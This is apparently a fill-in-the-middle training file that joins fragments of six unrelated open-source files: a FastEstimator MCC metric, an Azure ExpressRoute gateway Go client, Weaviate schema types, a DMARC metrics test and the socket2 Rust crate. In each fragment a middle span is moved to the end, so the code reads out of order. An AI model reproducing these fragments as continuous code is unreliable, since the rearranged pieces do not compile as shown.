cancel_task = Context.LOOP.create_task(cancel(data))
Context.CORO_TASKS.append(cancel_task)
context.run()
if status == CoreStatus.DONE:
assert data.status == CoreStatus.DONE
assert exp.status == CoreStatus.DONE
else:
assert data.status == CoreStatus.FAIL
assert exp.status == CoreStatus.FAIL
| cancel |
mcc.py | # Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Union, Iterable
import numpy as np
from sklearn.metrics import matthews_corrcoef
from fastestimator.trace.meta._per_ds import per_ds
from fastestimator.trace.trace import Trace
from fastestimator.util.data import Any, Data, Dict
from fastestimator.util.traceability_util import traceable
from fastestimator.util.util import to_number
@per_ds
@traceable()
class MCC(Trace):
"""A trace which computes the Matthews Correlation Coefficient for a given set of predictions.
This is a preferable metric to accuracy or F1 score since it automatically corrects for class imbalances and does
not depend on the choice of target class (https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6941312/). Ideal value is 1,
a value of 0 means your predictions are completely uncorrelated with the true data. A value less than zero implies
anti-correlation (you should invert your classifier predictions in order to do better).
Args:
true_key: Name of the key that corresponds to ground truth in the batch dictionary.
pred_key: Name of the key that corresponds to predicted score in the batch dictionary.
mode: What mode(s) to execute this Trace in. For example, "train", "eval", "test", or "infer". To execute
regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument
like "!infer" or "!train".
ds_id: What dataset id(s) to execute this Trace in. To execute regardless of ds_id, pass None. To execute in all
ds_ids except for a particular one, you can pass an argument like "!ds1".
output_name: What to call the output from this trace (for example in the logger output).
per_ds: Whether to automatically compute this metric individually for every ds_id it runs on, in addition to
computing an aggregate across all ds_ids on which it runs. This is automatically False if `output_name`
contains a "|" character.
**kwargs: Additional keyword arguments that pass to sklearn.metrics.matthews_corrcoef()
Raises:
ValueError: One of ["y_true", "y_pred"] argument exists in `kwargs`.
"""
def __init__(self,
true_key: str,
pred_key: str,
mode: Union[None, str, Iterable[str]] = ("eval", "test"),
ds_id: Union[None, str, Iterable[str]] = None,
output_name: str = "mcc",
per_ds: bool = True,
**kwargs) -> None:
MCC.check_kwargs(kwargs)
super().__init__(inputs=(true_key, pred_key), mode=mode, outputs=output_name, ds_id=ds_id)
self.kwargs = kwargs
self.y_true = []
self.y_pred = []
self.per_ds = per_ds
@property
def true_key(self) -> str:
return self.inputs[0]
@property
def pred_key(self) -> str:
return self.inputs[1]
def on_epoch_begin(self, data: Data) -> None:
self.y_true = []
self.y_pred = []
def on_batch_end(self, data: Data) -> None:
y_true, y_pred = to_number(data[self.true_key]), to_number(data[self.pred_key])
if y_true.shape[-1] > 1 and y_true.ndim > 1:
y_true = np.argmax(y_true, axis=-1)
if y_pred.shape[-1] > 1 and y_pred.ndim > 1:
y_pred = np.argmax(y_pred, axis=-1)
else:
y_pred = np.round(y_pred)
assert y_pred.size == y_true.size
self.y_true.extend(y_true)
self.y_pred.extend(y_pred)
def on_epoch_end(self, data: Data) -> None:
|
@staticmethod
def check_kwargs(kwargs: Dict[str, Any]) -> None:
"""Check if `kwargs` has any blacklist argument and raise an error if it does.
Args:
kwargs: Keywork arguments to be examined.
Raises:
ValueError: One of ["y_true", "y_pred"] argument exists in `kwargs`.
"""
blacklist = ["y_true", "y_pred"]
illegal_kwarg = [x for x in blacklist if x in kwargs]
if illegal_kwarg:
raise ValueError(
f"Arguments {illegal_kwarg} cannot exist in kwargs, since FastEstimator will later directly use them in"
" sklearn.metrics.matthews_corrcoef()")
| data.write_with_log(self.outputs[0], matthews_corrcoef(y_true=self.y_true, y_pred=self.y_pred, **self.kwargs)) |
expressroutegateways.go | package network
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
import (
"context"
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/autorest/validation"
"github.com/Azure/go-autorest/tracing"
"net/http"
)
// ExpressRouteGatewaysClient is the network Client
type ExpressRouteGatewaysClient struct {
BaseClient
}
// NewExpressRouteGatewaysClient creates an instance of the ExpressRouteGatewaysClient client.
func NewExpressRouteGatewaysClient(subscriptionID string) ExpressRouteGatewaysClient {
return NewExpressRouteGatewaysClientWithBaseURI(DefaultBaseURI, subscriptionID)
}
// NewExpressRouteGatewaysClientWithBaseURI creates an instance of the ExpressRouteGatewaysClient client using a custom
// endpoint. Use this when interacting with an Azure cloud that uses a non-standard base URI (sovereign clouds, Azure
// stack).
func NewExpressRouteGatewaysClientWithBaseURI(baseURI string, subscriptionID string) ExpressRouteGatewaysClient {
return ExpressRouteGatewaysClient{NewWithBaseURI(baseURI, subscriptionID)}
}
// CreateOrUpdate creates or updates a ExpressRoute gateway in a specified resource group.
// Parameters:
// resourceGroupName - the name of the resource group.
// expressRouteGatewayName - the name of the ExpressRoute gateway.
// putExpressRouteGatewayParameters - parameters required in an ExpressRoute gateway PUT operation.
func (client ExpressRouteGatewaysClient) CreateOrUpdate(ctx context.Context, resourceGroupName string, expressRouteGatewayName string, putExpressRouteGatewayParameters ExpressRouteGateway) (result ExpressRouteGatewaysCreateOrUpdateFuture, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.CreateOrUpdate")
defer func() {
sc := -1
if result.Response() != nil {
sc = result.Response().StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
if err := validation.Validate([]validation.Validation{
{TargetValue: putExpressRouteGatewayParameters,
Constraints: []validation.Constraint{{Target: "putExpressRouteGatewayParameters.ExpressRouteGatewayProperties", Name: validation.Null, Rule: false,
Chain: []validation.Constraint{{Target: "putExpressRouteGatewayParameters.ExpressRouteGatewayProperties.VirtualHub", Name: validation.Null, Rule: true, Chain: nil}}}}}}); err != nil {
return result, validation.NewError("network.ExpressRouteGatewaysClient", "CreateOrUpdate", err.Error())
}
req, err := client.CreateOrUpdatePreparer(ctx, resourceGroupName, expressRouteGatewayName, putExpressRouteGatewayParameters)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "CreateOrUpdate", nil, "Failure preparing request")
return
}
result, err = client.CreateOrUpdateSender(req)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "CreateOrUpdate", nil, "Failure sending request")
return
}
return
}
// CreateOrUpdatePreparer prepares the CreateOrUpdate request.
func (client ExpressRouteGatewaysClient) CreateOrUpdatePreparer(ctx context.Context, resourceGroupName string, expressRouteGatewayName string, putExpressRouteGatewayParameters ExpressRouteGateway) (*http.Request, error) {
pathParameters := map[string]interface{}{
"expressRouteGatewayName": autorest.Encode("path", expressRouteGatewayName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
const APIVersion = "2020-07-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
putExpressRouteGatewayParameters.Etag = nil
preparer := autorest.CreatePreparer(
autorest.AsContentType("application/json; charset=utf-8"),
autorest.AsPut(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteGateways/{expressRouteGatewayName}", pathParameters),
autorest.WithJSON(putExpressRouteGatewayParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// CreateOrUpdateSender sends the CreateOrUpdate request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) CreateOrUpdateSender(req *http.Request) (future ExpressRouteGatewaysCreateOrUpdateFuture, err error) {
var resp *http.Response
resp, err = client.Send(req, azure.DoRetryWithRegistration(client.Client))
if err != nil {
return
}
var azf azure.Future
azf, err = azure.NewFutureFromResponse(resp)
future.FutureAPI = &azf
future.Result = func(client ExpressRouteGatewaysClient) (erg ExpressRouteGateway, err error) {
var done bool
done, err = future.DoneWithContext(context.Background(), client)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysCreateOrUpdateFuture", "Result", future.Response(), "Polling failure")
return
}
if !done {
err = azure.NewAsyncOpIncompleteError("network.ExpressRouteGatewaysCreateOrUpdateFuture")
return
}
sender := autorest.DecorateSender(client, autorest.DoRetryForStatusCodes(client.RetryAttempts, client.RetryDuration, autorest.StatusCodesForRetry...))
if erg.Response.Response, err = future.GetResult(sender); err == nil && erg.Response.Response.StatusCode != http.StatusNoContent {
erg, err = client.CreateOrUpdateResponder(erg.Response.Response)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysCreateOrUpdateFuture", "Result", erg.Response.Response, "Failure responding to request")
}
}
return
}
return
}
// CreateOrUpdateResponder handles the response to the CreateOrUpdate request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) CreateOrUpdateResponder(resp *http.Response) (result ExpressRouteGateway, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusCreated),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// Delete deletes the specified ExpressRoute gateway in a resource group. An ExpressRoute gateway resource can only be
// deleted when there are no connection subresources.
// Parameters:
// resourceGroupName - the name of the resource group.
// expressRouteGatewayName - the name of the ExpressRoute gateway.
func (client ExpressRouteGatewaysClient) Delete(ctx context.Context, resourceGroupName string, expressRouteGatewayName string) (result ExpressRouteGatewaysDeleteFuture, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.Delete")
defer func() {
sc := -1
if result.Response() != nil {
sc = result.Response().StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.DeletePreparer(ctx, resourceGroupName, expressRouteGatewayName)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Delete", nil, "Failure preparing request")
return
}
result, err = client.DeleteSender(req)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Delete", nil, "Failure sending request")
return
}
return
}
// DeletePreparer prepares the Delete request.
func (client ExpressRouteGatewaysClient) DeletePreparer(ctx context.Context, resourceGroupName string, expressRouteGatewayName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"expressRouteGatewayName": autorest.Encode("path", expressRouteGatewayName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
const APIVersion = "2020-07-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsDelete(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteGateways/{expressRouteGatewayName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// DeleteSender sends the Delete request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) DeleteSender(req *http.Request) (future ExpressRouteGatewaysDeleteFuture, err error) {
var resp *http.Response
resp, err = client.Send(req, azure.DoRetryWithRegistration(client.Client))
if err != nil {
return
}
var azf azure.Future
azf, err = azure.NewFutureFromResponse(resp)
future.FutureAPI = &azf
future.Result = func(client ExpressRouteGatewaysClient) (ar autorest.Response, err error) {
var done bool
done, err = future.DoneWithContext(context.Background(), client)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysDeleteFuture", "Result", future.Response(), "Polling failure")
return
}
if !done {
err = azure.NewAsyncOpIncompleteError("network.ExpressRouteGatewaysDeleteFuture")
return
}
ar.Response = future.Response()
return
}
return
}
// DeleteResponder handles the response to the Delete request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent),
autorest.ByClosing())
result.Response = resp
return
}
// Get fetches the details of a ExpressRoute gateway in a resource group.
// Parameters:
// resourceGroupName - the name of the resource group.
// expressRouteGatewayName - the name of the ExpressRoute gateway.
func (client ExpressRouteGatewaysClient) Get(ctx context.Context, resourceGroupName string, expressRouteGatewayName string) (result ExpressRouteGateway, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.Get")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.GetPreparer(ctx, resourceGroupName, expressRouteGatewayName)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Get", nil, "Failure preparing request")
return
}
resp, err := client.GetSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Get", resp, "Failure sending request")
return
}
result, err = client.GetResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Get", resp, "Failure responding to request")
return
}
return
}
// GetPreparer prepares the Get request.
func (client ExpressRouteGatewaysClient) GetPreparer(ctx context.Context, resourceGroupName string, expressRouteGatewayName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"expressRouteGatewayName": autorest.Encode("path", expressRouteGatewayName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
const APIVersion = "2020-07-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteGateways/{expressRouteGatewayName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// GetSender sends the Get request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) GetSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// GetResponder handles the response to the Get request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) GetResponder(resp *http.Response) (result ExpressRouteGateway, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListByResourceGroup lists ExpressRoute gateways in a given resource group.
// Parameters:
// resourceGroupName - the name of the resource group.
func (client ExpressRouteGatewaysClient) ListByResourceGroup(ctx context.Context, resourceGroupName string) (result ExpressRouteGatewayList, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.ListByResourceGroup")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.ListByResourceGroupPreparer(ctx, resourceGroupName)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListByResourceGroup", nil, "Failure preparing request")
return
}
resp, err := client.ListByResourceGroupSender(req)
if err != nil |
result, err = client.ListByResourceGroupResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListByResourceGroup", resp, "Failure responding to request")
return
}
return
}
// ListByResourceGroupPreparer prepares the ListByResourceGroup request.
func (client ExpressRouteGatewaysClient) ListByResourceGroupPreparer(ctx context.Context, resourceGroupName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
const APIVersion = "2020-07-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteGateways", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// ListByResourceGroupSender sends the ListByResourceGroup request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) ListByResourceGroupSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// ListByResourceGroupResponder handles the response to the ListByResourceGroup request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) ListByResourceGroupResponder(resp *http.Response) (result ExpressRouteGatewayList, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListBySubscription lists ExpressRoute gateways under a given subscription.
func (client ExpressRouteGatewaysClient) ListBySubscription(ctx context.Context) (result ExpressRouteGatewayList, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.ListBySubscription")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.ListBySubscriptionPreparer(ctx)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListBySubscription", nil, "Failure preparing request")
return
}
resp, err := client.ListBySubscriptionSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListBySubscription", resp, "Failure sending request")
return
}
result, err = client.ListBySubscriptionResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListBySubscription", resp, "Failure responding to request")
return
}
return
}
// ListBySubscriptionPreparer prepares the ListBySubscription request.
func (client ExpressRouteGatewaysClient) ListBySubscriptionPreparer(ctx context.Context) (*http.Request, error) {
pathParameters := map[string]interface{}{
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
const APIVersion = "2020-07-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Network/expressRouteGateways", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// ListBySubscriptionSender sends the ListBySubscription request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) ListBySubscriptionSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// ListBySubscriptionResponder handles the response to the ListBySubscription request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) ListBySubscriptionResponder(resp *http.Response) (result ExpressRouteGatewayList, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
| {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListByResourceGroup", resp, "Failure sending request")
return
} |
data_types.go | // _ _
// __ _____ __ ___ ___ __ _| |_ ___
// \ \ /\ / / _ \/ _` \ \ / / |/ _` | __/ _ \
// \ V V / __/ (_| |\ V /| | (_| | || __/
// \_/\_/ \___|\__,_| \_/ |_|\__,_|\__\___|
//
// Copyright © 2016 - 2021 SeMI Technologies B.V. All rights reserved.
//
// CONTACT: [email protected]
//
package schema
import (
"errors"
"fmt"
"unicode"
)
type DataType string
const (
// DataTypeCRef The data type is a cross-reference, it is starting with a capital letter
DataTypeCRef DataType = "cref"
// DataTypeString The data type is a value of type string
DataTypeString DataType = "string"
// DataTypeText The data type is a value of type string
DataTypeText DataType = "text"
// DataTypeInt The data type is a value of type int
DataTypeInt DataType = "int"
// DataTypeNumber The data type is a value of type number/float
DataTypeNumber DataType = "number"
// DataTypeBoolean The data type is a value of type boolean
DataTypeBoolean DataType = "boolean"
// DataTypeDate The data type is a value of type date
DataTypeDate DataType = "date"
// DataTypeGeoCoordinates is used to represent geo coordintaes, i.e. latitude
// and longitude pairs of locations on earth
DataTypeGeoCoordinates DataType = "geoCoordinates"
// DataTypePhoneNumber represents a parsed/to-be-parsed phone number
DataTypePhoneNumber DataType = "phoneNumber"
)
var PrimitiveDataTypes []DataType = []DataType{DataTypeString, DataTypeText, DataTypeInt, DataTypeNumber, DataTypeBoolean, DataTypeDate, DataTypeGeoCoordinates, DataTypePhoneNumber}
type PropertyKind int
const (
PropertyKindPrimitive PropertyKind = 1
PropertyKindRef PropertyKind = 2
)
type PropertyDataType interface {
Kind() PropertyKind
IsPrimitive() bool
AsPrimitive() DataType
IsReference() bool
Classes() []ClassName
ContainsClass(name ClassName) bool
}
type propertyDataType struct {
kind PropertyKind
primitiveType DataType
classes []ClassName
}
func (p *propertyDataType) Kind() PropertyKind {
return p.kind
}
func (p *propertyDataType) IsPrimitive() bool {
return p.kind == PropertyKindPrimitive
}
func (p *propertyDataType) AsPrimitive() DataType {
if p.kind != PropertyKindPrimitive {
panic("not primitive type")
}
return p.primitiveType
}
func (p *propertyDataType) IsReference() bool {
return p.kind == PropertyKindRef
}
func (p *propertyDataType) Classes() []ClassName {
if p.kind != PropertyKindRef {
panic("not MultipleRef type")
}
return p.classes
}
func (p *propertyDataType) ContainsClass(needle ClassName) bool {
if p.kind != PropertyKindRef {
panic("not MultipleRef type")
}
for _, class := range p.classes {
if class == needle {
return true
}
}
return false
}
// Based on the schema, return a valid description of the defined datatype
func (s *Schema) FindPropertyDataType(dataType []string) (PropertyDataType, error) {
if len(dataType) < 1 {
return nil, errors.New("dataType must have at least one element")
} else if len(dataType) == 1 {
someDataType := dataType[0]
if len(someDataType) == 0 {
return nil, fmt.Errorf("dataType cannot be an empty string")
}
firstLetter := rune(someDataType[0])
if unicode.IsLower(firstLetter) {
switch someDataType {
case string(DataTypeString), string(DataTypeText),
string(DataTypeInt), string(DataTypeNumber),
string(DataTypeBoolean), string(DataTypeDate), string(DataTypeGeoCoordinates),
string(DataTypePhoneNumber):
return &propertyDataType{
kind: PropertyKindPrimitive,
primitiveType: DataType(someDataType),
}, nil
default:
return nil, fmt.Errorf("Unknown primitive data type '%s'", someDataType)
}
}
}
/* implies len(dataType) > 1, or first element is a class already */
var classes []ClassName
for _, someDataType := range dataType {
if ValidNetworkClassName(someDataType) { | else {
// this is a local reference
className, err := ValidateClassName(someDataType)
if err != nil {
return nil, err
}
if s.FindClassByName(className) == nil {
return nil, fmt.Errorf("SingleRef class name '%s' does not exist", className)
}
classes = append(classes, className)
}
}
return &propertyDataType{
kind: PropertyKindRef,
classes: classes,
}, nil
}
|
// this is a network instance
classes = append(classes, ClassName(someDataType))
} |
test_metrics_persister.py | from dmarc_metrics_exporter.dmarc_metrics import (
Disposition,
DmarcMetrics,
DmarcMetricsCollection,
Meta,
)
from dmarc_metrics_exporter.metrics_persister import MetricsPersister
def test_roundtrip_metrics(tmp_path):
metrics_db = tmp_path / "metrics.db"
metrics = DmarcMetricsCollection(
{
Meta(
reporter="google.com",
from_domain="mydomain.de",
dkim_domain="dkim-domain.org",
spf_domain="spf-domain.org",
): DmarcMetrics(
total_count=42,
disposition_counts={Disposition.QUARANTINE: 4},
dmarc_compliant_count=24,
dkim_aligned_count=5,
dkim_pass_count=10,
spf_aligned_count=4,
spf_pass_count=8,
)
}
)
persister = MetricsPersister(metrics_db)
persister.save(metrics)
assert persister.load() == metrics
def test_returns_newly_initialized_metrics_if_db_is_non_existent(tmp_path):
| metrics_db = tmp_path / "metrics.db"
persister = MetricsPersister(metrics_db)
assert persister.load() == DmarcMetricsCollection() |
|
lib.rs | // Copyright 2015 The Rust Project Developers.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Utilities for creating and using sockets.
//!
//! The goal of this crate is to create and use a socket using advanced
//! configuration options (those that are not available in the types in the
//! standard library) without using any unsafe code.
//!
//! This crate provides as direct as possible access to the system's
//! functionality for sockets, this means little effort to provide
//! cross-platform utilities. It is up to the user to know how to use sockets
//! when using this crate. *If you don't know how to create a socket using
//! libc/system calls then this crate is not for you*. Most, if not all,
//! functions directly relate to the equivalent system call with no error
//! handling applied, so no handling errors such as [`EINTR`]. As a result using
//! this crate can be a little wordy, but it should give you maximal flexibility
//! over configuration of sockets.
//!
//! [`EINTR`]: std::io::ErrorKind::Interrupted
//!
//! # Examples
//!
//! ```no_run
//! # fn main() -> std::io::Result<()> {
//! use std::net::{SocketAddr, TcpListener};
//! use socket2::{Socket, Domain, Type};
//!
//! // Create a TCP listener bound to two addresses.
//! let socket = Socket::new(Domain::IPV6, Type::STREAM, None)?;
//!
//! socket.set_only_v6(false)?;
//! let address: SocketAddr = "[::1]:12345".parse().unwrap();
//! socket.bind(&address.into())?;
//! socket.listen(128)?;
//!
//! let listener: TcpListener = socket.into();
//! // ...
//! # drop(listener);
//! # Ok(()) }
//! ```
//!
//! ## Features
//!
//! This crate has a single feature `all`, which enables all functions even ones
//! that are not available on all OSs.
#![doc(html_root_url = "https://docs.rs/socket2/0.3")]
#![deny(missing_docs, missing_debug_implementations, rust_2018_idioms)]
// Show required OS/features on docs.rs.
#![cfg_attr(docsrs, feature(doc_cfg))]
// Disallow warnings when running tests.
#![cfg_attr(test, deny(warnings))]
// Disallow warnings in examples.
#![doc(test(attr(deny(warnings))))]
use std::fmt;
use std::mem::MaybeUninit;
use std::net::SocketAddr;
use std::ops::{Deref, DerefMut};
use std::time::Duration;
/// Macro to implement `fmt::Debug` for a type, printing the constant names
/// rather than a number.
///
/// Note this is used in the `sys` module and thus must be defined before
/// defining the modules.
macro_rules! impl_debug {
(
// Type name for which to implement `fmt::Debug`.
$type: path,
$(
$(#[$target: meta])*
// The flag(s) to check. | // `libc` but `winapi`.
$libc: ident :: $flag: ident
),+ $(,)*
) => {
impl std::fmt::Debug for $type {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let string = match self.0 {
$(
$(#[$target])*
$libc :: $flag => stringify!($flag),
)+
n => return write!(f, "{}", n),
};
f.write_str(string)
}
}
};
}
/// Macro to convert from one network type to another.
macro_rules! from {
($from: ty, $for: ty) => {
impl From<$from> for $for {
fn from(socket: $from) -> $for {
#[cfg(unix)]
unsafe {
<$for>::from_raw_fd(socket.into_raw_fd())
}
#[cfg(windows)]
unsafe {
<$for>::from_raw_socket(socket.into_raw_socket())
}
}
}
};
}
mod sockaddr;
mod socket;
mod sockref;
#[cfg(unix)]
#[path = "sys/unix.rs"]
mod sys;
#[cfg(windows)]
#[path = "sys/windows.rs"]
mod sys;
#[cfg(not(any(windows, unix)))]
compile_error!("Socket2 doesn't support the compile target");
use sys::c_int;
pub use sockaddr::SockAddr;
pub use socket::Socket;
pub use sockref::SockRef;
/// Specification of the communication domain for a socket.
///
/// This is a newtype wrapper around an integer which provides a nicer API in
/// addition to an injection point for documentation. Convenience constants such
/// as [`Domain::IPV4`], [`Domain::IPV6`], etc, are provided to avoid reaching
/// into libc for various constants.
///
/// This type is freely interconvertible with C's `int` type, however, if a raw
/// value needs to be provided.
#[derive(Copy, Clone, Eq, PartialEq)]
pub struct Domain(c_int);
impl Domain {
/// Domain for IPv4 communication, corresponding to `AF_INET`.
pub const IPV4: Domain = Domain(sys::AF_INET);
/// Domain for IPv6 communication, corresponding to `AF_INET6`.
pub const IPV6: Domain = Domain(sys::AF_INET6);
/// Returns the correct domain for `address`.
pub const fn for_address(address: SocketAddr) -> Domain {
match address {
SocketAddr::V4(_) => Domain::IPV4,
SocketAddr::V6(_) => Domain::IPV6,
}
}
}
impl From<c_int> for Domain {
fn from(d: c_int) -> Domain {
Domain(d)
}
}
impl From<Domain> for c_int {
fn from(d: Domain) -> c_int {
d.0
}
}
/// Specification of communication semantics on a socket.
///
/// This is a newtype wrapper around an integer which provides a nicer API in
/// addition to an injection point for documentation. Convenience constants such
/// as [`Type::STREAM`], [`Type::DGRAM`], etc, are provided to avoid reaching
/// into libc for various constants.
///
/// This type is freely interconvertible with C's `int` type, however, if a raw
/// value needs to be provided.
#[derive(Copy, Clone, Eq, PartialEq)]
pub struct Type(c_int);
impl Type {
/// Type corresponding to `SOCK_STREAM`.
///
/// Used for protocols such as TCP.
pub const STREAM: Type = Type(sys::SOCK_STREAM);
/// Type corresponding to `SOCK_DGRAM`.
///
/// Used for protocols such as UDP.
pub const DGRAM: Type = Type(sys::SOCK_DGRAM);
